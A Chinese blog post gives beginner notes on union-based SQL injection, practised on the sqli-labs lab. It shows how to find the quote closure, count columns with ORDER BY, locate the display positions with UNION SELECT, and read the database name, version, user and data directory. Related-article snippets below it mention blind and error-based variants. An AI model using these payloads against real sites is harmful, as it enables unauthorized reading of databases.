SQL注入的小知识

最新推荐文章于 2024-08-05 17:45:46 发布
最新推荐文章于 2024-08-05 17:45:46 发布
阅读量2.5k 收藏
点赞数 1
分类专栏: SQL注入 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52074678/article/details/121875927
版权

登录数据库
mysql -u[用户名] -p[密码]

查看数据库
show databases;

使用某个数据库
use [数据库名];

查看这个库里面有什么表
show tables;

查看table1表中所有的数据
select * from table1;

union联合
select * from table1 where id<3 union select 1,2,3;
左边右边同时执行

select * from table1 where id<-3 union select 1,2,3;
select * from table1 where id<'x' union select 1,2,3;
此时会执行右边

注释符
--+
#
/**/

--------------------------------------------------------------------------

步骤1.
推断数据库的语法大概是什么

select * from 某个表 where id='参数' limit 0,1;

select * from 某个表 where id='2\' limit 0,1;

步骤2.
让他报错,显示自己的闭合方式
'2\' LIMIT 0,1
' ''  ')    '')    ))    ''))    '))

步骤3:
验证目标数据库语句参数闭合方式
select * from 某个表 where id ='2' limit 0,1
执行之后
select * from 某个表 where id='2';

步骤4:
确定有多少列
select * from 某个表 where id='2' order by 10 --+ 'limit 0,1;
我觉得你数据库有10列,发现错误,之后使用二分法猜,最后发现order by 3是对的
所以判断,数据有3列(sqli-labs)
select  x,y,z from 某个表 where id ='-2'  order by 10 --+ 'limit 0,1;
 
步骤5:
使用联合查询
因为刚刚推理出他有3列,所以union select 1,2,3
记住!前面的参数必须报错
select x,y,z from 某个表 where id='-2' union select 1,2,3 --+ 'limit 0,1;
这下会显示报错位!!!
我们发现2,3为报错位

步骤6:
开始刺探数据库内部内容
-2 ' union select 1,database(),3 --+
此时2号位会显示数据库库名
发现security
version()
user()
@@datadir

information_schema是自带的,相当于数据库的户口本
information_schema---tables保存着所以数据库的库名以及自己的表名

渗透者:'
关注
专栏目录
【肾透测试笔记 --SQL注入篇_mysql】
A98llen的博客
05-10 581
SQL注入篇_mysql写在前面MySQL中的注释一些函数注入之前1.有无回显2.判断类型3.有无布尔类型4.判断是否有延时一、联合查询1.判断列数2.判断显示位置3.修改数字4.窃取数据库->表->列->数据库名表名列名数据二、报错注入1.updatexml2.extractvalue...三、布尔盲注1.确定库名长度,按位测试2.确定表名长度,按位测试3.dump数据四、延时注入1.确定数据库名字长度,按位测试2.确定数据表名字长度,按位测试3.dump数据五、堆叠查询 写在前面 My
mysql order by sql注入_sql注入之order by猜列数问题
weixin_29452603的博客
01-20 1217
环境: xampp-win32-5.6.3-0-VC11 dvwa-1.0.8前言有幸在网上搜到一款非常不错的渗透测试演练系统 — dvwa ,作为学习,演练真的非常强大啊! 在学习的过程中也遇到一些问题,所以这里做学习分享记录。问题简述在用dvwa做sql 注入检测时,遇到一个小小的问题 — order by 猜出来的列数跟数据库表中的列数不匹配。(注入时猜出来两个字段,但是实际数据库的表中却...
SQL注入--猜解数据表列数
YYYYU_ZHIZZZ的博客
04-28 175
sqli-labs练习SQL注入
SQL注入
最新发布
moyuan_4s的博客
08-05 1131
它接受三个参数,第一个参数是要更新的XML文档,第二个参数是XPath表达式,用于指定要更新的节点的位置,第三个参数是新的节点值。该函数将返回更新后的XML文档。它接受三个参数,第一个参数是要更新的XML文档,第二个参数是XPath表达式,用于指定要更新的节点的位置,第三个参数是新的节点值。它接受两个参数,第一个参数是要提取值的XML文档,第二个参数是XPath表达式,用于指定要提取的值的位置。它接受两个参数,第一个参数是要提取值的XML文档,第二个参数是XPath表达式,用于指定要提取的值的位置。
sql手工注入
qq_53106085的博客
07-18 518
information_schema,系统数据库,包含所有数据库相关信息。 information_schema.schemata中schema_name列,字段为所有数据库名称。 information_schema.tables中table_name列对应数据库所有表名,其中table_schema列是所有数据库名。 information_schema.columns中,column_name列对应所有列名,其中table_schema列.
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
这部分从Background-1基础知识开始,涵盖了SQL注入的基础概念,如SQL语法、查询结构和如何识别易受攻击的点。Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
sql注入字典fuzz
01-11
本文将深入探讨SQL注入字典fuzz的相关知识点。 #### 二、SQL注入基础 SQL注入是通过将恶意的SQL代码插入到应用程序中正常的数据输入字段内,从而欺骗服务器执行非预期的操作。这种攻击可以用来读取数据库中的敏感...
sql注入网站源码
04-09
以下是关于SQL注入和ASP网站安全的一些关键知识点: 1. **SQL注入原理**:攻击者通过输入恶意构造的SQL代码,使得原本的查询语句发生变化,从而实现未授权的数据访问。例如,如果一个登录页面的查询语句是"SELECT *...
SQL注入基础
weixin_40195907的博客
11-30 3381
一、SQL注入条件 1、程序没有对输入进行严格的过滤 2、输入的语句能够被带入数据库中执行 二、SQL注入步骤 Step1:判断是否存在注入 字符型 数字型 Step2:获取数据库信息 1、order by 数字 用于判断列数 2、union 合并多条语句的查询结果 3、select 1,2 数据显示位 4、获取用户、数据库版本、数据库 select users(); select version(); select database(); 5、使用information_schema数据库 ①scheme
[SQL注入] 联合查询
weixin_43586169的博客
05-07 582
详细概述了SQL注入中的四大基本手法之一的联合查询
MySQL_SQL布尔盲注
m0_50211409的博客
04-24 584
1,判断数据库名的长度 and length(database())>9 判断数据库等于8,为8个 2,获取数据库的ascii码值 and ascii(substr(database(),1,1))>97 *由于一个一个猜太麻烦了,可以使用burp工具的lntruedr模块进行爆破, 抓包之前需要将>号改成=号才能进行爆破。 1号选择cluster bomb意思是使用交叉爆破 2号表示需要查询的数据库字符的第一位 3号表示需要进行爆破的ascii码 *设置爆破参数 切换到payloa
SQL注入-联合查询
weixin_51706044的博客
02-05 1778
文章目录前言一、判断注入点还是整形或字符型二、判断列数三.找到显示位四.获取库名五.获取表名六.获取列名七.获取字段信息总结 前言 联合查询: 一:按照注入语法分为:联合查询注入Union/报错查询注入error/布尔型注入Boolean/延时注入Time/堆叠查询注入 二:联合查询注入是最简单的一种注入方式,但是要求页面必须有显示位.否则无法注入. 显示位:可以理解为从数据库提取的数据被显示在前端. 如果没有显示位,我们无法查看注入的结果. 三:联合查询一般步骤: 1、判断注入点还是整形或字符型 2、判
详细|通过mysql学习sql注入
st3pby的博客
06-08 1070
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
sqli注入原理浅析
u012684933的专栏
02-10 795
当发现sql注入点之后,如何进行sql注入呢?     要想成功sqli注入,需要以下3步:     1. 猜解存在注入点的sqli语句查询时,查询了几列     2. 查找到所有的表名字和列名字    3. 根据表明和列名,进行注入,拖出数据库的数据      为什么需要猜解查询了几列呢?我们通过如下例子来说明。假设某个注入点的sql查询条件是如下: SELECT colum
sql注入详细总结
qq_61991235的博客
02-13 2491
SQL注入详细总结 注:菜鸡笔记,酌情参考,欢迎指正 SQL注入原理 当对用户传入数据过滤不严格时,用户可在 Web表单递交 或 输入域名或 `页面请求处提交查询的SQL语句,将这些查询语句传递给后端数据执行,从而引发实际执行的语句与预期执行的语句不同,导致数据库原有的信息泄露,篡改,甚至删除。 sql关键字 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 注: information_schema.
order by判断列数
m0_57514540的博客
02-03 206
order by注入
SQL注入漏洞测试入门指南
SQL注入漏洞测试入门篇 SQL注入漏洞测试是一种常见的Web应用安全漏洞,通过对用户输入数据的合法性判断不当,攻击者可以 inject恶意 SQL 代码,获取敏感数据或控制服务器。以下是 SQL 注入漏洞测试的相关知识点: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透者:'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值